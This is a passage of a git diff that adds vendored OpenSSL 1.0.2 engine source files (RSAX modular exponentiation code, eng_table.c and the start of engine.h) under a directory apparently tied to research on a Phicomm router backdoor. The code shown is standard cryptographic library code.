+        !ENGINE_set_destroy_function(e, e_rsax_destroy) ||
+        !ENGINE_set_init_function(e, e_rsax_init) ||
+        !ENGINE_set_finish_function(e, e_rsax_finish) ||
+        !ENGINE_set_ctrl_function(e, e_rsax_ctrl) ||
+        !ENGINE_set_cmd_defns(e, e_rsax_cmd_defns))
+        return 0;
+
+# ifndef OPENSSL_NO_RSA
+    meth1 = RSA_PKCS1_SSLeay();
+    e_rsax_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    e_rsax_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    e_rsax_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    e_rsax_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+    e_rsax_rsa.bn_mod_exp = meth1->bn_mod_exp;
+# endif
+    return 1;
+}
+
+static ENGINE *ENGINE_rsax(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+# ifndef OPENSSL_NO_RSA
+/* Used to attach our own key-data to an RSA structure */
+static int rsax_ex_data_idx = -1;
+# endif
+
+static int e_rsax_destroy(ENGINE *e)
+{
+    return 1;
+}
+
+/* (de)initialisation functions. */
+static int e_rsax_init(ENGINE *e)
+{
+# ifndef OPENSSL_NO_RSA
+    if (rsax_ex_data_idx == -1)
+        rsax_ex_data_idx = RSA_get_ex_new_index(0, NULL, NULL, NULL, NULL);
+# endif
+    if (rsax_ex_data_idx == -1)
+        return 0;
+    return 1;
+}
+
+static int e_rsax_finish(ENGINE *e)
+{
+    return 1;
+}
+
+static int e_rsax_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void))
+{
+    int to_return = 1;
+
+    switch (cmd) {
+        /* The command isn't understood by this engine */
+    default:
+        to_return = 0;
+        break;
+    }
+
+    return to_return;
+}
+
+# ifndef OPENSSL_NO_RSA
+
+#  ifdef _WIN32
+typedef unsigned __int64 UINT64;
+#  else
+typedef unsigned long long UINT64;
+#  endif
+typedef unsigned short UINT16;
+
+/*
+ * Table t is interleaved in the following manner: The order in memory is
+ * t[0][0], t[0][1], ..., t[0][7], t[1][0], ... A particular 512-bit value is
+ * stored in t[][index] rather than the more normal t[index][]; i.e. the
+ * qwords of a particular entry in t are not adjacent in memory
+ */
+
+/* Init BIGNUM b from the interleaved UINT64 array */
+static int interleaved_array_to_bn_512(BIGNUM *b, UINT64 *array);
+
+/*
+ * Extract array elements from BIGNUM b To set the whole array from b, call
+ * with n=8
+ */
+static int bn_extract_to_array_512(const BIGNUM *b, unsigned int n,
+                                   UINT64 *array);
+
+struct mod_ctx_512 {
+    UINT64 t[8][8];
+    UINT64 m[8];
+    UINT64 m1[8];               /* 2^278 % m */
+    UINT64 m2[8];               /* 2^640 % m */
+    UINT64 k1[2];               /* (- 1/m) % 2^128 */
+};
+
+static int mod_exp_pre_compute_data_512(UINT64 *m, struct mod_ctx_512 *data);
+
+void mod_exp_512(UINT64 *result, /* 512 bits, 8 qwords */
+                 UINT64 *g,     /* 512 bits, 8 qwords */
+                 UINT64 *exp,   /* 512 bits, 8 qwords */
+                 struct mod_ctx_512 *data);
+
+typedef struct st_e_rsax_mod_ctx {
+    UINT64 type;
+    union {
+        struct mod_ctx_512 b512;
+    } ctx;
+
+} E_RSAX_MOD_CTX;
+
+static E_RSAX_MOD_CTX *e_rsax_get_ctx(RSA *rsa, int idx, BIGNUM *m)
+{
+    E_RSAX_MOD_CTX *hptr;
+
+    if (idx < 0 || idx > 2)
+        return NULL;
+
+    hptr = RSA_get_ex_data(rsa, rsax_ex_data_idx);
+    if (!hptr) {
+        hptr = OPENSSL_malloc(3 * sizeof(E_RSAX_MOD_CTX));
+        if (!hptr)
+            return NULL;
+        hptr[2].type = hptr[1].type = hptr[0].type = 0;
+        RSA_set_ex_data(rsa, rsax_ex_data_idx, hptr);
+    }
+
+    if (hptr[idx].type == (UINT64)BN_num_bits(m))
+        return hptr + idx;
+
+    if (BN_num_bits(m) == 512) {
+        UINT64 _m[8];
+        bn_extract_to_array_512(m, 8, _m);
+        memset(&hptr[idx].ctx.b512, 0, sizeof(struct mod_ctx_512));
+        mod_exp_pre_compute_data_512(_m, &hptr[idx].ctx.b512);
+    }
+
+    hptr[idx].type = BN_num_bits(m);
+    return hptr + idx;
+}
+
+static int e_rsax_rsa_finish(RSA *rsa)
+{
+    E_RSAX_MOD_CTX *hptr = RSA_get_ex_data(rsa, rsax_ex_data_idx);
+    if (hptr) {
+        OPENSSL_free(hptr);
+        RSA_set_ex_data(rsa, rsax_ex_data_idx, NULL);
+    }
+    if (rsa->_method_mod_n)
+        BN_MONT_CTX_free(rsa->_method_mod_n);
+    if (rsa->_method_mod_p)
+        BN_MONT_CTX_free(rsa->_method_mod_p);
+    if (rsa->_method_mod_q)
+        BN_MONT_CTX_free(rsa->_method_mod_q);
+    return 1;
+}
+
+static int e_rsax_bn_mod_exp(BIGNUM *r, const BIGNUM *g, const BIGNUM *e,
+                             const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *in_mont,
+                             E_RSAX_MOD_CTX *rsax_mod_ctx)
+{
+    if (rsax_mod_ctx && BN_get_flags(e, BN_FLG_CONSTTIME) != 0) {
+        if (BN_num_bits(m) == 512) {
+            UINT64 _r[8];
+            UINT64 _g[8];
+            UINT64 _e[8];
+
+            /* Init the arrays from the BIGNUMs */
+            bn_extract_to_array_512(g, 8, _g);
+            bn_extract_to_array_512(e, 8, _e);
+
+            mod_exp_512(_r, _g, _e, &rsax_mod_ctx->ctx.b512);
+            /* Return the result in the BIGNUM */
+            interleaved_array_to_bn_512(r, _r);
+            return 1;
+        }
+    }
+
+    return BN_mod_exp_mont(r, g, e, m, ctx, in_mont);
+}
+
+/*
+ * Declares for the Intel CIAP 512-bit / CRT / 1024 bit RSA modular
+ * exponentiation routine precalculations and a structure to hold the
+ * necessary values.  These files are meant to live in crypto/rsa/ in the
+ * target openssl.
+ */
+
+/*
+ * Local method: extracts a piece from a BIGNUM, to fit it into
+ * an array. Call with n=8 to extract an entire 512-bit BIGNUM
+ */
+static int bn_extract_to_array_512(const BIGNUM *b, unsigned int n,
+                                   UINT64 *array)
+{
+    int i;
+    UINT64 tmp;
+    unsigned char bn_buff[64];
+    memset(bn_buff, 0, 64);
+    if (BN_num_bytes(b) > 64) {
+        printf("Can't support this byte size\n");
+        return 0;
+    }
+    if (BN_num_bytes(b) != 0) {
+        if (!BN_bn2bin(b, bn_buff + (64 - BN_num_bytes(b)))) {
+            printf("Error's in bn2bin\n");
+            /* We have to error, here */
+            return 0;
+        }
+    }
+    while (n-- > 0) {
+        array[n] = 0;
+        for (i = 7; i >= 0; i--) {
+            tmp = bn_buff[63 - (n * 8 + i)];
+            array[n] |= tmp << (8 * i);
+        }
+    }
+    return 1;
+}
+
+/* Init a 512-bit BIGNUM from the UINT64*_ (8 * 64) interleaved array */
+static int interleaved_array_to_bn_512(BIGNUM *b, UINT64 *array)
+{
+    unsigned char tmp[64];
+    int n = 8;
+    int i;
+    while (n-- > 0) {
+        for (i = 7; i >= 0; i--) {
+            tmp[63 - (n * 8 + i)] = (unsigned char)(array[n] >> (8 * i));
+    }}
+    BN_bin2bn(tmp, 64, b);
+    return 0;
+}
+
+/* The main 512bit precompute call */
+static int mod_exp_pre_compute_data_512(UINT64 *m, struct mod_ctx_512 *data)
+{
+    BIGNUM two_768, two_640, two_128, two_512, tmp, _m, tmp2;
+
+    /* We need a BN_CTX for the modulo functions */
+    BN_CTX *ctx;
+    /* Some tmps */
+    UINT64 _t[8];
+    int i, j, ret = 0;
+
+    /* Init _m with m */
+    BN_init(&_m);
+    interleaved_array_to_bn_512(&_m, m);
+    memset(_t, 0, 64);
+
+    /* Inits */
+    BN_init(&two_768);
+    BN_init(&two_640);
+    BN_init(&two_128);
+    BN_init(&two_512);
+    BN_init(&tmp);
+    BN_init(&tmp2);
+
+    /* Create our context */
+    if ((ctx = BN_CTX_new()) == NULL) {
+        goto err;
+    }
+    BN_CTX_start(ctx);
+
+    /*
+     * For production, if you care, these only need to be set once,
+     * and may be made constants.
+     */
+    BN_lshift(&two_768, BN_value_one(), 768);
+    BN_lshift(&two_640, BN_value_one(), 640);
+    BN_lshift(&two_128, BN_value_one(), 128);
+    BN_lshift(&two_512, BN_value_one(), 512);
+
+    if (0 == (m[7] & 0x8000000000000000)) {
+        exit(1);
+    }
+    if (0 == (m[0] & 0x1)) {    /* Odd modulus required for Mont */
+        exit(1);
+    }
+
+    /* Precompute m1 */
+    BN_mod(&tmp, &two_768, &_m, ctx);
+    if (!bn_extract_to_array_512(&tmp, 8, &data->m1[0])) {
+        goto err;
+    }
+
+    /* Precompute m2 */
+    BN_mod(&tmp, &two_640, &_m, ctx);
+    if (!bn_extract_to_array_512(&tmp, 8, &data->m2[0])) {
+        goto err;
+    }
+
+    /*
+     * Precompute k1, a 128b number = ((-1)* m-1 ) mod 2128; k1 should
+     * be non-negative.
+     */
+    BN_mod_inverse(&tmp, &_m, &two_128, ctx);
+    if (!BN_is_zero(&tmp)) {
+        BN_sub(&tmp, &two_128, &tmp);
+    }
+    if (!bn_extract_to_array_512(&tmp, 2, &data->k1[0])) {
+        goto err;
+    }
+
+    /* Precompute t */
+    for (i = 0; i < 8; i++) {
+        BN_zero(&tmp);
+        if (i & 1) {
+            BN_add(&tmp, &two_512, &tmp);
+        }
+        if (i & 2) {
+            BN_add(&tmp, &two_512, &tmp);
+        }
+        if (i & 4) {
+            BN_add(&tmp, &two_640, &tmp);
+        }
+
+        BN_nnmod(&tmp2, &tmp, &_m, ctx);
+        if (!bn_extract_to_array_512(&tmp2, 8, _t)) {
+            goto err;
+        }
+        for (j = 0; j < 8; j++)
+            data->t[j][i] = _t[j];
+    }
+
+    /* Precompute m */
+    for (i = 0; i < 8; i++) {
+        data->m[i] = m[i];
+    }
+
+    ret = 1;
+
+ err:
+    /* Cleanup */
+    if (ctx != NULL) {
+        BN_CTX_end(ctx);
+        BN_CTX_free(ctx);
+    }
+    BN_free(&two_768);
+    BN_free(&two_640);
+    BN_free(&two_128);
+    BN_free(&two_512);
+    BN_free(&tmp);
+    BN_free(&tmp2);
+    BN_free(&_m);
+
+    return ret;
+}
+
+static int e_rsax_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                              BN_CTX *ctx)
+{
+    BIGNUM *r1, *m1, *vrfy;
+    BIGNUM local_dmp1, local_dmq1, local_c, local_r1;
+    BIGNUM *dmp1, *dmq1, *c, *pr1;
+    int ret = 0;
+
+    BN_CTX_start(ctx);
+    r1 = BN_CTX_get(ctx);
+    m1 = BN_CTX_get(ctx);
+    vrfy = BN_CTX_get(ctx);
+
+    {
+        BIGNUM local_p, local_q;
+        BIGNUM *p = NULL, *q = NULL;
+        int error = 0;
+
+        /*
+         * Make sure BN_mod_inverse in Montgomery intialization uses the
+         * BN_FLG_CONSTTIME flag (unless RSA_FLAG_NO_CONSTTIME is set)
+         */
+        if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+            BN_init(&local_p);
+            p = &local_p;
+            BN_with_flags(p, rsa->p, BN_FLG_CONSTTIME);
+
+            BN_init(&local_q);
+            q = &local_q;
+            BN_with_flags(q, rsa->q, BN_FLG_CONSTTIME);
+        } else {
+            p = rsa->p;
+            q = rsa->q;
+        }
+
+        if (rsa->flags & RSA_FLAG_CACHE_PRIVATE) {
+            if (!BN_MONT_CTX_set_locked
+                (&rsa->_method_mod_p, CRYPTO_LOCK_RSA, p, ctx))
+                error = 1;
+            if (!BN_MONT_CTX_set_locked
+                (&rsa->_method_mod_q, CRYPTO_LOCK_RSA, q, ctx))
+                error = 1;
+        }
+
+        /* clean up */
+        if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+            BN_free(&local_p);
+            BN_free(&local_q);
+        }
+        if (error)
+            goto err;
+    }
+
+    if (rsa->flags & RSA_FLAG_CACHE_PUBLIC)
+        if (!BN_MONT_CTX_set_locked
+            (&rsa->_method_mod_n, CRYPTO_LOCK_RSA, rsa->n, ctx))
+            goto err;
+
+    /* compute I mod q */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        c = &local_c;
+        BN_with_flags(c, I, BN_FLG_CONSTTIME);
+        if (!BN_mod(r1, c, rsa->q, ctx))
+            goto err;
+    } else {
+        if (!BN_mod(r1, I, rsa->q, ctx))
+            goto err;
+    }
+
+    /* compute r1^dmq1 mod q */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        dmq1 = &local_dmq1;
+        BN_with_flags(dmq1, rsa->dmq1, BN_FLG_CONSTTIME);
+    } else
+        dmq1 = rsa->dmq1;
+
+    if (!e_rsax_bn_mod_exp(m1, r1, dmq1, rsa->q, ctx,
+                           rsa->_method_mod_q, e_rsax_get_ctx(rsa, 0,
+                                                              rsa->q)))
+        goto err;
+
+    /* compute I mod p */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        c = &local_c;
+        BN_with_flags(c, I, BN_FLG_CONSTTIME);
+        if (!BN_mod(r1, c, rsa->p, ctx))
+            goto err;
+    } else {
+        if (!BN_mod(r1, I, rsa->p, ctx))
+            goto err;
+    }
+
+    /* compute r1^dmp1 mod p */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        dmp1 = &local_dmp1;
+        BN_with_flags(dmp1, rsa->dmp1, BN_FLG_CONSTTIME);
+    } else
+        dmp1 = rsa->dmp1;
+
+    if (!e_rsax_bn_mod_exp(r0, r1, dmp1, rsa->p, ctx,
+                           rsa->_method_mod_p, e_rsax_get_ctx(rsa, 1,
+                                                              rsa->p)))
+        goto err;
+
+    if (!BN_sub(r0, r0, m1))
+        goto err;
+    /*
+     * This will help stop the size of r0 increasing, which does affect the
+     * multiply if it optimised for a power of 2 size
+     */
+    if (BN_is_negative(r0))
+        if (!BN_add(r0, r0, rsa->p))
+            goto err;
+
+    if (!BN_mul(r1, r0, rsa->iqmp, ctx))
+        goto err;
+
+    /* Turn BN_FLG_CONSTTIME flag on before division operation */
+    if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+        pr1 = &local_r1;
+        BN_with_flags(pr1, r1, BN_FLG_CONSTTIME);
+    } else
+        pr1 = r1;
+    if (!BN_mod(r0, pr1, rsa->p, ctx))
+        goto err;
+
+    /*
+     * If p < q it is occasionally possible for the correction of adding 'p'
+     * if r0 is negative above to leave the result still negative. This can
+     * break the private key operations: the following second correction
+     * should *always* correct this rare occurrence. This will *never* happen
+     * with OpenSSL generated keys because they ensure p > q [steve]
+     */
+    if (BN_is_negative(r0))
+        if (!BN_add(r0, r0, rsa->p))
+            goto err;
+    if (!BN_mul(r1, r0, rsa->q, ctx))
+        goto err;
+    if (!BN_add(r0, r1, m1))
+        goto err;
+
+    if (rsa->e && rsa->n) {
+        if (!e_rsax_bn_mod_exp
+            (vrfy, r0, rsa->e, rsa->n, ctx, rsa->_method_mod_n,
+             e_rsax_get_ctx(rsa, 2, rsa->n)))
+            goto err;
+
+        /*
+         * If 'I' was greater than (or equal to) rsa->n, the operation will
+         * be equivalent to using 'I mod n'. However, the result of the
+         * verify will *always* be less than 'n' so we don't check for
+         * absolute equality, just congruency.
+         */
+        if (!BN_sub(vrfy, vrfy, I))
+            goto err;
+        if (!BN_mod(vrfy, vrfy, rsa->n, ctx))
+            goto err;
+        if (BN_is_negative(vrfy))
+            if (!BN_add(vrfy, vrfy, rsa->n))
+                goto err;
+        if (!BN_is_zero(vrfy)) {
+            /*
+             * 'I' and 'vrfy' aren't congruent mod n. Don't leak
+             * miscalculated CRT output, just do a raw (slower) mod_exp and
+             * return that instead.
+             */
+
+            BIGNUM local_d;
+            BIGNUM *d = NULL;
+
+            if (!(rsa->flags & RSA_FLAG_NO_CONSTTIME)) {
+                d = &local_d;
+                BN_with_flags(d, rsa->d, BN_FLG_CONSTTIME);
+            } else
+                d = rsa->d;
+            if (!e_rsax_bn_mod_exp(r0, I, d, rsa->n, ctx,
+                                   rsa->_method_mod_n, e_rsax_get_ctx(rsa, 2,
+                                                                      rsa->n)))
+                goto err;
+        }
+    }
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+
+    return ret;
+}
+# endif                         /* !OPENSSL_NO_RSA */
+#endif                          /* !COMPILE_RSAX */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_table.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_table.c
new file mode 100644
index 0000000..27d31f7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/eng_table.c
@@ -0,0 +1,358 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/lhash.h>
+#include "eng_int.h"
+
+/* The type of the items in the table */
+typedef struct st_engine_pile {
+    /* The 'nid' of this algorithm/mode */
+    int nid;
+    /* ENGINEs that implement this algorithm/mode. */
+    STACK_OF(ENGINE) *sk;
+    /* The default ENGINE to perform this algorithm/mode. */
+    ENGINE *funct;
+    /*
+     * Zero if 'sk' is newer than the cached 'funct', non-zero otherwise
+     */
+    int uptodate;
+} ENGINE_PILE;
+
+DECLARE_LHASH_OF(ENGINE_PILE);
+
+/* The type exposed in eng_int.h */
+struct st_engine_table {
+    LHASH_OF(ENGINE_PILE) piles;
+};                              /* ENGINE_TABLE */
+
+typedef struct st_engine_pile_doall {
+    engine_table_doall_cb *cb;
+    void *arg;
+} ENGINE_PILE_DOALL;
+
+/* Global flags (ENGINE_TABLE_FLAG_***). */
+static unsigned int table_flags = 0;
+
+/* API function manipulating 'table_flags' */
+unsigned int ENGINE_get_table_flags(void)
+{
+    return table_flags;
+}
+
+void ENGINE_set_table_flags(unsigned int flags)
+{
+    table_flags = flags;
+}
+
+/* Internal functions for the "piles" hash table */
+static unsigned long engine_pile_hash(const ENGINE_PILE *c)
+{
+    return c->nid;
+}
+
+static int engine_pile_cmp(const ENGINE_PILE *a, const ENGINE_PILE *b)
+{
+    return a->nid - b->nid;
+}
+
+static IMPLEMENT_LHASH_HASH_FN(engine_pile, ENGINE_PILE)
+static IMPLEMENT_LHASH_COMP_FN(engine_pile, ENGINE_PILE)
+
+static int int_table_check(ENGINE_TABLE **t, int create)
+{
+    LHASH_OF(ENGINE_PILE) *lh;
+
+    if (*t)
+        return 1;
+    if (!create)
+        return 0;
+    if ((lh = lh_ENGINE_PILE_new()) == NULL)
+        return 0;
+    *t = (ENGINE_TABLE *)lh;
+    return 1;
+}
+
+/*
+ * Privately exposed (via eng_int.h) functions for adding and/or removing
+ * ENGINEs from the implementation table
+ */
+int engine_table_register(ENGINE_TABLE **table, ENGINE_CLEANUP_CB *cleanup,
+                          ENGINE *e, const int *nids, int num_nids,
+                          int setdefault)
+{
+    int ret = 0, added = 0;
+    ENGINE_PILE tmplate, *fnd;
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if (!(*table))
+        added = 1;
+    if (!int_table_check(table, 1))
+        goto end;
+    if (added)
+        /* The cleanup callback needs to be added */
+        engine_cleanup_add_first(cleanup);
+    while (num_nids--) {
+        tmplate.nid = *nids;
+        fnd = lh_ENGINE_PILE_retrieve(&(*table)->piles, &tmplate);
+        if (!fnd) {
+            fnd = OPENSSL_malloc(sizeof(ENGINE_PILE));
+            if (!fnd)
+                goto end;
+            fnd->uptodate = 1;
+            fnd->nid = *nids;
+            fnd->sk = sk_ENGINE_new_null();
+            if (!fnd->sk) {
+                OPENSSL_free(fnd);
+                goto end;
+            }
+            fnd->funct = NULL;
+            (void)lh_ENGINE_PILE_insert(&(*table)->piles, fnd);
+        }
+        /* A registration shouldn't add duplciate entries */
+        (void)sk_ENGINE_delete_ptr(fnd->sk, e);
+        /*
+         * if 'setdefault', this ENGINE goes to the head of the list
+         */
+        if (!sk_ENGINE_push(fnd->sk, e))
+            goto end;
+        /* "touch" this ENGINE_PILE */
+        fnd->uptodate = 0;
+        if (setdefault) {
+            if (!engine_unlocked_init(e)) {
+                ENGINEerr(ENGINE_F_ENGINE_TABLE_REGISTER,
+                          ENGINE_R_INIT_FAILED);
+                goto end;
+            }
+            if (fnd->funct)
+                engine_unlocked_finish(fnd->funct, 0);
+            fnd->funct = e;
+            fnd->uptodate = 1;
+        }
+        nids++;
+    }
+    ret = 1;
+ end:
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return ret;
+}
+
+static void int_unregister_cb_doall_arg(ENGINE_PILE *pile, ENGINE *e)
+{
+    int n;
+    /* Iterate the 'c->sk' stack removing any occurance of 'e' */
+    while ((n = sk_ENGINE_find(pile->sk, e)) >= 0) {
+        (void)sk_ENGINE_delete(pile->sk, n);
+        pile->uptodate = 0;
+    }
+    if (pile->funct == e) {
+        engine_unlocked_finish(e, 0);
+        pile->funct = NULL;
+    }
+}
+
+static IMPLEMENT_LHASH_DOALL_ARG_FN(int_unregister_cb, ENGINE_PILE, ENGINE)
+
+void engine_table_unregister(ENGINE_TABLE **table, ENGINE *e)
+{
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if (int_table_check(table, 0))
+        lh_ENGINE_PILE_doall_arg(&(*table)->piles,
+                                 LHASH_DOALL_ARG_FN(int_unregister_cb),
+                                 ENGINE, e);
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+}
+
+static void int_cleanup_cb_doall(ENGINE_PILE *p)
+{
+    sk_ENGINE_free(p->sk);
+    if (p->funct)
+        engine_unlocked_finish(p->funct, 0);
+    OPENSSL_free(p);
+}
+
+static IMPLEMENT_LHASH_DOALL_FN(int_cleanup_cb, ENGINE_PILE)
+
+void engine_table_cleanup(ENGINE_TABLE **table)
+{
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    if (*table) {
+        lh_ENGINE_PILE_doall(&(*table)->piles,
+                             LHASH_DOALL_FN(int_cleanup_cb));
+        lh_ENGINE_PILE_free(&(*table)->piles);
+        *table = NULL;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+}
+
+/* return a functional reference for a given 'nid' */
+#ifndef ENGINE_TABLE_DEBUG
+ENGINE *engine_table_select(ENGINE_TABLE **table, int nid)
+#else
+ENGINE *engine_table_select_tmp(ENGINE_TABLE **table, int nid, const char *f,
+                                int l)
+#endif
+{
+    ENGINE *ret = NULL;
+    ENGINE_PILE tmplate, *fnd = NULL;
+    int initres, loop = 0;
+
+    if (!(*table)) {
+#ifdef ENGINE_TABLE_DEBUG
+        fprintf(stderr, "engine_table_dbg: %s:%d, nid=%d, nothing "
+                "registered!\n", f, l, nid);
+#endif
+        return NULL;
+    }
+    ERR_set_mark();
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    /*
+     * Check again inside the lock otherwise we could race against cleanup
+     * operations. But don't worry about a fprintf(stderr).
+     */
+    if (!int_table_check(table, 0))
+        goto end;
+    tmplate.nid = nid;
+    fnd = lh_ENGINE_PILE_retrieve(&(*table)->piles, &tmplate);
+    if (!fnd)
+        goto end;
+    if (fnd->funct && engine_unlocked_init(fnd->funct)) {
+#ifdef ENGINE_TABLE_DEBUG
+        fprintf(stderr, "engine_table_dbg: %s:%d, nid=%d, using "
+                "ENGINE '%s' cached\n", f, l, nid, fnd->funct->id);
+#endif
+        ret = fnd->funct;
+        goto end;
+    }
+    if (fnd->uptodate) {
+        ret = fnd->funct;
+        goto end;
+    }
+ trynext:
+    ret = sk_ENGINE_value(fnd->sk, loop++);
+    if (!ret) {
+#ifdef ENGINE_TABLE_DEBUG
+        fprintf(stderr, "engine_table_dbg: %s:%d, nid=%d, no "
+                "registered implementations would initialise\n", f, l, nid);
+#endif
+        goto end;
+    }
+    /* Try to initialise the ENGINE? */
+    if ((ret->funct_ref > 0) || !(table_flags & ENGINE_TABLE_FLAG_NOINIT))
+        initres = engine_unlocked_init(ret);
+    else
+        initres = 0;
+    if (initres) {
+        /* Update 'funct' */
+        if ((fnd->funct != ret) && engine_unlocked_init(ret)) {
+            /* If there was a previous default we release it. */
+            if (fnd->funct)
+                engine_unlocked_finish(fnd->funct, 0);
+            fnd->funct = ret;
+#ifdef ENGINE_TABLE_DEBUG
+            fprintf(stderr, "engine_table_dbg: %s:%d, nid=%d, "
+                    "setting default to '%s'\n", f, l, nid, ret->id);
+#endif
+        }
+#ifdef ENGINE_TABLE_DEBUG
+        fprintf(stderr, "engine_table_dbg: %s:%d, nid=%d, using "
+                "newly initialised '%s'\n", f, l, nid, ret->id);
+#endif
+        goto end;
+    }
+    goto trynext;
+ end:
+    /*
+     * If it failed, it is unlikely to succeed again until some future
+     * registrations have taken place. In all cases, we cache.
+     */
+    if (fnd)
+        fnd->uptodate = 1;
+#ifdef ENGINE_TABLE_DEBUG
+    if (ret)
+        fprintf(stderr, "engine_table_dbg: %s:%d, nid=%d, caching "
+                "ENGINE '%s'\n", f, l, nid, ret->id);
+    else
+        fprintf(stderr, "engine_table_dbg: %s:%d, nid=%d, caching "
+                "'no matching ENGINE'\n", f, l, nid);
+#endif
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    /*
+     * Whatever happened, any failed init()s are not failures in this
+     * context, so clear our error state.
+     */
+    ERR_pop_to_mark();
+    return ret;
+}
+
+/* Table enumeration */
+
+static void int_cb_doall_arg(ENGINE_PILE *pile, ENGINE_PILE_DOALL *dall)
+{
+    dall->cb(pile->nid, pile->sk, pile->funct, dall->arg);
+}
+
+static IMPLEMENT_LHASH_DOALL_ARG_FN(int_cb, ENGINE_PILE, ENGINE_PILE_DOALL)
+
+void engine_table_doall(ENGINE_TABLE *table, engine_table_doall_cb *cb,
+                        void *arg)
+{
+    ENGINE_PILE_DOALL dall;
+    dall.cb = cb;
+    dall.arg = arg;
+    if (table)
+        lh_ENGINE_PILE_doall_arg(&table->piles,
+                                 LHASH_DOALL_ARG_FN(int_cb),
+                                 ENGINE_PILE_DOALL, &dall);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/engine.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/engine.h
new file mode 100644
index 0000000..bd7b591
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/engine.h
@@ -0,0 +1,960 @@
+/* openssl/engine.h */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
